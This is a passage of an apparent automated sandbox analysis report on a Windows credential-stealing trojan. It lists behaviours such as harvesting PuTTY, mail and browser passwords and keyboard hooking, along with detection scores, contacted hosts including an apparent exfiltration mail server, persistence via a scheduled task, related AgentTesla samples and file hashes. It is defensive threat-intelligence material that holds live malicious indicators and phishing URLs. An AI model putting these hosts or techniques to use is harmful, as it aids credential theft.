Win32_NetworkAdapter, often done to detect virtual machines) 18->68 28 WmiPrvSE.exe 20->28         started        30 conhost.exe 20->30         started        70 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->70 72 Tries to steal Mail credentials (via file / registry access) 22->72 74 Tries to harvest and steal browser information (history, passwords, etc) 22->74 76 Installs a global keyboard hook 22->76 32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        signatures9 process10

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe29%ReversingLabs
                        SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe42%VirustotalBrowse
                        SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe29%ReversingLabs
                        C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe42%VirustotalBrowse
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        mail.elec-qatar.com2%VirustotalBrowse
                        fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        http://www.tiro.com0%URL Reputationsafe
                        http://www.goodfont.co.kr0%URL Reputationsafe
                        http://www.carterandcone.coml0%URL Reputationsafe
                        http://www.sajatypeworks.com0%URL Reputationsafe
                        http://www.typography.netD0%URL Reputationsafe
                        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                        http://www.sandoll.co.kr0%URL Reputationsafe
                        http://www.urwpp.deDPlease0%URL Reputationsafe
                        http://www.sakkal.com0%URL Reputationsafe
                        http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/01%VirustotalBrowse
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/00%Avira URL Cloudsafe
                        http://mail.elec-qatar.com0%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn0%VirustotalBrowse
                        http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
                        http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                        http://mail.elec-qatar.com2%VirustotalBrowse
                        http://www.zhongyicts.com.cn1%VirustotalBrowse
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        api.ipify.org
                        104.26.13.205
                        truefalse
                          high
                          mail.elec-qatar.com
                          50.87.139.143
                          truetrueunknown
                          fp2e7a.wpc.phicdn.net
                          192.229.211.108
                          truefalseunknown
                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.comSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designersGSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers/?SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://account.dyn.com/SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, jYRIGnZlROed.exe, 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designers?SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.tiro.comSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designersSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.goodfont.co.krSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.ipify.org/tMSBuild.exe, 00000008.00000002.1678075288.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002E6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.chiark.greenend.org.uk/~sgtatham/putty/0SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, jYRIGnZlROed.exe.0.drfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.carterandcone.comlSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sajatypeworks.comSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.typography.netDSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://api.ipify.orgSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1678075288.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, jYRIGnZlROed.exe, 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002E6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.founder.com.cn/cnSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designers/frere-user.htmlSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://mail.elec-qatar.comMSBuild.exe, 00000008.00000002.1678075288.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002EDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • 2%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers8SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.fonts.comSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.sandoll.co.krSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.urwpp.deDPleaseSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.zhongyicts.com.cnSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • 1%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1662329813.0000000003068000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1678075288.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, jYRIGnZlROed.exe, 00000009.00000002.1695168637.000000000322D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002E6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.sakkal.comSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        104.26.13.205
                                                        api.ipify.orgUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        50.87.139.143
                                                        mail.elec-qatar.comUnited States
                                                        46606UNIFIEDLAYER-AS-1UStrue
                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                        Analysis ID:1398430
                                                        Start date and time:2024-02-25 21:26:04 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 53s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:18
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
                                                        Detection:MAL
                                                        Classification:mal100.spre.troj.spyw.evad.winEXE@20/11@2/2
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 96%
                                                        • Number of executed functions: 139
                                                        • Number of non-executed functions: 31
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 23.221.242.90, 20.12.23.50, 72.21.81.240, 192.229.211.108, 20.3.187.198
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        TimeTypeDescription
                                                        20:26:52Task SchedulerRun new task: jYRIGnZlROed path: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
                                                        21:26:50API Interceptor1x Sleep call for process: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe modified
                                                        21:26:52API Interceptor14x Sleep call for process: powershell.exe modified
                                                        21:26:53API Interceptor9553988x Sleep call for process: MSBuild.exe modified
                                                        21:26:53API Interceptor1x Sleep call for process: jYRIGnZlROed.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        104.26.13.205https://worker-late-forest-e569.jmassell.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                          z646s6yeP6w9bbWjXY.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            specification sheet.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              https://m.exactag.com/ai.aspx?tc=d9bc40b07205bbd26a23a8d2e6b6b4f9&url=//secureyouerinfos.com/fhffdgg/sdssasas/mygsi/Y2FybGEuZ2luZXJAYXhhY3Rvci5jb20=Get hashmaliciousFake Captcha, HTMLPhisherBrowse
                                                                SecuriteInfo.com.Win32.MalwareX-gen.170.29118.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  https://c8ke.com/auxxxxpdfGet hashmaliciousFake Captcha, HTMLPhisherBrowse
                                                                    SecuriteInfo.com.Trojan.PackedNET.2698.11030.8996.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      z16tTOiU5haycBoIv.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        Fntzn.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          INQUIRY 2024-SP0006-B(01) INQ24-01220711.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            50.87.139.143SHIPPING DOC.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              New order.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                Quotation R2100131410.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                  SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    z92BankingDetails.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      z14Paymentslip.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        PO_0130717.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          SecuriteInfo.com.Win32.RATX-gen.20501.5539.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            SecuriteInfo.com.Win32.PWSX-gen.27494.29811.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                              SecuriteInfo.com.Trojan.MulDrop24.29879.27945.6957.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                fp2e7a.wpc.phicdn.netjxWttyaGxM.exeGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                • 192.229.211.108
                                                                                                Tejasnetworks.com.webinar.msiGet hashmaliciousUnknownBrowse
                                                                                                • 192.229.211.108
                                                                                                Polaristek.msiGet hashmaliciousUnknownBrowse
                                                                                                • 192.229.211.108
                                                                                                comviva.com.webinar.msiGet hashmaliciousUnknownBrowse
                                                                                                • 192.229.211.108
                                                                                                file.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                • 192.229.211.108
                                                                                                http://app-kartenabrechnung-l-larissa302261%5B.%5Dcodeanyapp%5B.%5DcomGet hashmaliciousUnknownBrowse
                                                                                                • 192.229.211.108
                                                                                                file.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                • 192.229.211.108
                                                                                                http://sarkerrentacars.comGet hashmaliciousUnknownBrowse
                                                                                                • 192.229.211.108
                                                                                                zt4lKwkzE6.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                • 192.229.211.108
                                                                                                De5U75mSup.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                • 192.229.211.108
                                                                                                api.ipify.orgSecuriteInfo.com.Win64.Evo-gen.19254.19116.exeGet hashmaliciousLuna LoggerBrowse
                                                                                                • 104.26.12.205
                                                                                                Lecture6.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                • 172.67.74.152
                                                                                                SecuriteInfo.com.Python.Stealer.1251.4514.5369.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.12.205
                                                                                                SecuriteInfo.com.Python.Stealer.1251.4514.5369.exeGet hashmaliciousPython StealerBrowse
                                                                                                • 104.26.12.205
                                                                                                https://worker-late-forest-e569.jmassell.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 104.26.13.205
                                                                                                Ekstre.pdf.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                • 104.26.12.205
                                                                                                eSnWvjyy0f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 104.26.12.205
                                                                                                PAYMENT SLIP.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                • 104.26.13.205
                                                                                                90971985 DRAFT.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                • 104.26.12.205
                                                                                                Ziraat Bankasi Swift Mesaji.pdf.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                • 172.67.74.152
                                                                                                mail.elec-qatar.comSHIPPING DOC.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 50.87.139.143
                                                                                                New order.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 50.87.139.143
                                                                                                Quotation R2100131410.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 50.87.139.143
                                                                                                SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 50.87.139.143
                                                                                                z92BankingDetails.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 50.87.139.143
                                                                                                z14Paymentslip.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 50.87.139.143
                                                                                                PO_0130717.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 50.87.139.143
                                                                                                SecuriteInfo.com.Win32.RATX-gen.20501.5539.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                • 50.87.139.143
                                                                                                SecuriteInfo.com.Win32.PWSX-gen.27494.29811.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                • 50.87.139.143
                                                                                                SecuriteInfo.com.Trojan.MulDrop24.29879.27945.6957.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 50.87.139.143
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                • 1.1.1.1
                                                                                                tJYmV684UD.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                • 104.26.4.15
                                                                                                file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                • 1.1.1.1
                                                                                                http://bullivantarabia.comGet hashmaliciousUnknownBrowse
                                                                                                • 1.1.1.1
                                                                                                80 percent lower legal in colorado 50815.jsGet hashmaliciousUnknownBrowse
                                                                                                • 172.67.135.213
                                                                                                80 percent lower legal in colorado 50815.jsGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.26.95
                                                                                                80 percent lower legal in colorado 50815.jsGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.26.95
                                                                                                80 percent lower legal in colorado 50815.jsGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.73.120
                                                                                                https://cdn.discordapp.com/attachments/1103880362347728966/1173825851121471628/WuqueID_2.2.msi?ex=65e69083&is=65d41b83&hm=ca02fcdde083740db41bbb41c5713bf277b51639f2793ea4e9b12a6ef64137df&Get hashmaliciousUnknownBrowse
                                                                                                • 162.159.133.233
                                                                                                ZT8OUnuIjX.exeGet hashmaliciousXehook StealerBrowse
                                                                                                • 172.67.177.174
                                                                                                UNIFIEDLAYER-AS-1UShttp://bullivantarabia.comGet hashmaliciousUnknownBrowse
                                                                                                • 192.185.107.115
                                                                                                cJVeMuYr6y.exeGet hashmaliciouslgoogLoaderBrowse
                                                                                                • 162.144.32.209
                                                                                                cJVeMuYr6y.exeGet hashmaliciousUnknownBrowse
                                                                                                • 162.144.32.209
                                                                                                1AIemYSAZy.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                                                                                • 50.87.178.128
                                                                                                https://tracker.club-os.com/campaign/click?99559ms99559gId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=https://blicblac%25E3%2580%2582com%2F#0xahbWFydGluLmpvbmVzQGNhLnZ1??1qlc86&byqbjkql%2FOvCobOHOpnLAboDm%2F1FFaDncpbagduZbrKi7QbrDUoJtP%2F%2FbWFydGluLmpvbmVzQGNhLnZ1&https://instagram.comGet hashmaliciousFake CaptchaBrowse
                                                                                                • 192.185.92.186
                                                                                                http://email.robly.com/ls/click?upn=IdEuq0w5NGjcvp67fJm0Fjx7zI0UoacAvfuhX8IXMfi-2FBcyVFfNBAnRRYn3xO-2B1CJBL1_x1qKbjhEBXTMhgFeszlbTPAP7pso9-2FxqCAo9mujVNdxRC-2Fe6szeUW2wUpsJPamXtYEX5TxNxvCL8y7P57m0ckeV4eInxu3K8zf4ZJir3swUgmhxHZ4ueQr8HlG-2FmusQJH6y7p25ps7Tk6J5qNmOony1meVnHS6SWYINya9roE9W5a8qQtJPhUrtwHjPNNr8-2FRq8ri-2Fd5oj6InCgVt40NRVo7kVkD4rXqnd5qh4hVxKxbkv-2B-2Bg5grednXpzEJrVoppO7kdIBlpx5FtxXkVy5jroHsBNlwPLvY7zHyi82KhBukRiMiFN-2Bq8Y5MIpQ3tDOtgM9smS8EBnUo-2BNczWmfSC7A0LEM5yvlMpWf2qtqc4I7FL0Pb-2FOBoG7nzLMuVBmfOyvltwMiXHcvatoR9WpKWTWbswWnOInmA3qfQw2YmDZYZTRlsjGJ1yVr4dcvvE98tzz8ObIb6wBOg-2BtttMS8VRCu3mc-2FvYkvjr5dNSCoVNCXZ0NX-2BlVkto2ZltzhjEciS#doc~mstewart@dsi.usGet hashmaliciousUnknownBrowse
                                                                                                • 50.116.112.104
                                                                                                SecuriteInfo.com.W64.KryptoCibule.A.gen.Eldorado.15028.11808.exeGet hashmaliciousXWormBrowse
                                                                                                • 162.144.32.209
                                                                                                https://m.exactag.com/ai.aspx?tc=d9bc40b07205bbd26a23a8d2e6b6b4f9&url=//secureyouerinfos.com/fhffdgg/sdssasas/silveroakins/bWF0dG1AcmR2Y29ycC5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 192.185.108.1
                                                                                                cotizaci#U00f3n1345.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 162.144.32.209
                                                                                                662891928.vbsGet hashmaliciousXWormBrowse
                                                                                                • 192.232.216.152
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                3b5074b1b5d032e5620f69f9f700ff0e80 percent lower legal in colorado 50815.jsGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                80 percent lower legal in colorado 50815.jsGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                80 percent lower legal in colorado 50815.jsGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                80 percent lower legal in colorado 50815.jsGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                Tejasnetworks.com.webinar.msiGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                Polaristek.msiGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                comviva.com.webinar.msiGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                cJVeMuYr6y.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                SecuriteInfo.com.Win64.HacktoolX-gen.24668.10031.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                SecuriteInfo.com.Win64.HacktoolX-gen.24668.10031.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.13.205
                                                                                                No context
                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
                                                                                                File Type:CSV text
                                                                                                Category:dropped
                                                                                                Size (bytes):2056
                                                                                                Entropy (8bit):5.342567089024067
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHKHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwqRb
                                                                                                MD5:83A6E29FD802325CCCB720870B60C618
                                                                                                SHA1:4CD8AC6CA2659E4E32D1B27A8A4E77ABF980EE43
                                                                                                SHA-256:A81A5B984180553C06E7C9CAE0BAF7E195950801F493996F48FA59F1ACC135B2
                                                                                                SHA-512:69CC81145ACCA3D5C154D3A11396C2AFAEC4135662A82124EA249817BE7066D782DE2C79FE985E23F32F9709C144E2C513C727CFD1A88D677F34EB25E868B560
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\
                                                                                                Process:C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
                                                                                                File Type:CSV text
                                                                                                Category:dropped
                                                                                                Size (bytes):2056
                                                                                                Entropy (8bit):5.342567089024067
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHKHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwqRb
                                                                                                MD5:83A6E29FD802325CCCB720870B60C618
                                                                                                SHA1:4CD8AC6CA2659E4E32D1B27A8A4E77ABF980EE43
                                                                                                SHA-256:A81A5B984180553C06E7C9CAE0BAF7E195950801F493996F48FA59F1ACC135B2
                                                                                                SHA-512:69CC81145ACCA3D5C154D3A11396C2AFAEC4135662A82124EA249817BE7066D782DE2C79FE985E23F32F9709C144E2C513C727CFD1A88D677F34EB25E868B560
                                                                                                Malicious:false
